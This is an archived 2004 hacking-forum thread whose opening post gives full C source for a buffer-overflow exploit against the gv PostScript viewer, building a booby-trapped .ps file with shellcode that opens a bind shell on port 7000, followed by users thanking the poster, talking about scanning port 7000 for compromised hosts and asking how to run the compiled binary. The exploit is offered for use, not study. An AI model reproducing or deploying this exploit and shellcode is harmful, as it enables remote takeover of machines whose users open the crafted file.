hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Public Downloads
riga
Aug 17 2004, 10:10 AM
CODE
/*
* gv postscript viewer exploit , infamous42md AT hotpop DOT com
*
* run of the mill bof.  spawns a remote shell on port 7000.  woopty doo. if
* someone has been able to exploit the heap overflow in cfengine, please email
* me and teach me something. after days of pain i've concluded it's not
* possible b/c you can't manipulate the heap enough to get anything good in
* front of you.  please prove me wrong so i can learn.
*
* shouts to mitakeet
*
*  [n00b localho outernet] netstat -ant | grep 7000
*  [n00b localho outernet] gcc -Wall -o gvown gvown.c
*  [n00b localho outernet] ./gvown 0xbffff350
*  [n00b localho outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps
*  [n00b localho outernet] netstat -ant | grep 7000
*  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN  
 
*/
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"


/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
   

int main(int argc, char **argv)
{
   int len, x, fd;
   char    buf[BS];
   u_long  retaddr;

   if(argc < 2){
       fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
       return EXIT_FAILURE;
   }
   sscanf(argv[1], "%lx", &retaddr);

   /* create 3vil buf */
   memset(buf, NOP, BS);
   strcpy(buf, PS_COMMENT);
   len = strlen(buf);
   for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
       memcpy(buf+x+len, &retaddr, sizeof(retaddr));
   len += x + NNOPS;
   strcpy(buf+len, remote);
   strcat(buf+len, "\n");
   len += strlen(remote) + 1;   /* + NULL */

   /* create the 3vil file */
   if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
       die("open");
   
   if(write(fd, buf, len) < 0)
       die("write");

   close(fd);
   
   return 0;
}

SecureD
Aug 17 2004, 06:59 PM
hmmz 13 downloads and me first reply dry.gif

common dude's think he deserve's it!!


well tnx dude for the sploit


scan p7000 wright?? smile.gif
ZakOpath
Aug 17 2004, 07:10 PM
Wow a new exploit. Is there one who can compleate it ? I tryed it self once biggrin.gif dident work
ZakOpath
Aug 17 2004, 07:12 PM
Lol sry didt not see that its already was compleateed tongue.gif Thx for the spolit
SeNe
Aug 18 2004, 02:10 AM
thanks for the compiled exploit, lets try this new toy.
mandawar
Aug 18 2004, 10:15 AM
thanks for the nice exploit (the bin), would be useful
Mandawar
Killahbee
Aug 18 2004, 11:15 AM
QUOTE (peerke @ Aug 17 2004, 06:59 PM)
hmmz 13 downloads and me first reply dry.gif

common dude's think he deserve's it!!


well tnx dude for the sploit


scan p7000 wright?? smile.gif

Well goodluck scanning on port 7000!!
jaune
Aug 18 2004, 11:46 AM
thanks for the exploit wink.gif
Bombers
Aug 18 2004, 01:07 PM
thanks for the exploit , realy nice work tongue.gif
SecureD
Aug 18 2004, 03:51 PM
QUOTE (Killahbee @ Aug 18 2004, 11:15 AM)
QUOTE (peerke @ Aug 17 2004, 06:59 PM)
hmmz 13 downloads and me first reply  dry.gif

common dude's think he deserve's it!!


well tnx dude for the sploit


scan p7000 wright?? smile.gif

Well goodluck scanning on port 7000!!

get lost bart dry.gif


already found the right one
fre4k
Aug 18 2004, 04:06 PM
what`s the right port to scan ? huh.gif Port: 7000 spawns a remote shell on port and it isn`t the port to scan! wink.gif
clems[
Aug 19 2004, 07:44 AM
What s the command to use it ?? i don t understand
Thanks
riga
Aug 20 2004, 03:53 PM
Description:
Local buffer overflow exploit for gv postscript viewer. Spawns a shell on port 7000.

http://packetstormsecurity.nl/filedesc/gv-exploit.c.html

Edit: ohh sorry wrong information that is 4 the local sploit

sorry 4 my bad english ^^
prog
Aug 20 2004, 07:22 PM
CODE
The default port number is "40701".

is that correct?
ZakOpath
Aug 21 2004, 08:34 AM
I having some probs whit cygwin.dll.. I ahve it in my system32 dir but there is this stuid error popping up all the time
ZakOpath
Aug 21 2004, 08:53 AM
cannot find producktSpot__getreent in the DLL-Dir cygwin.dll <. thats the error i get sad.gif
riga
Aug 21 2004, 09:14 AM
test with this .dll
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.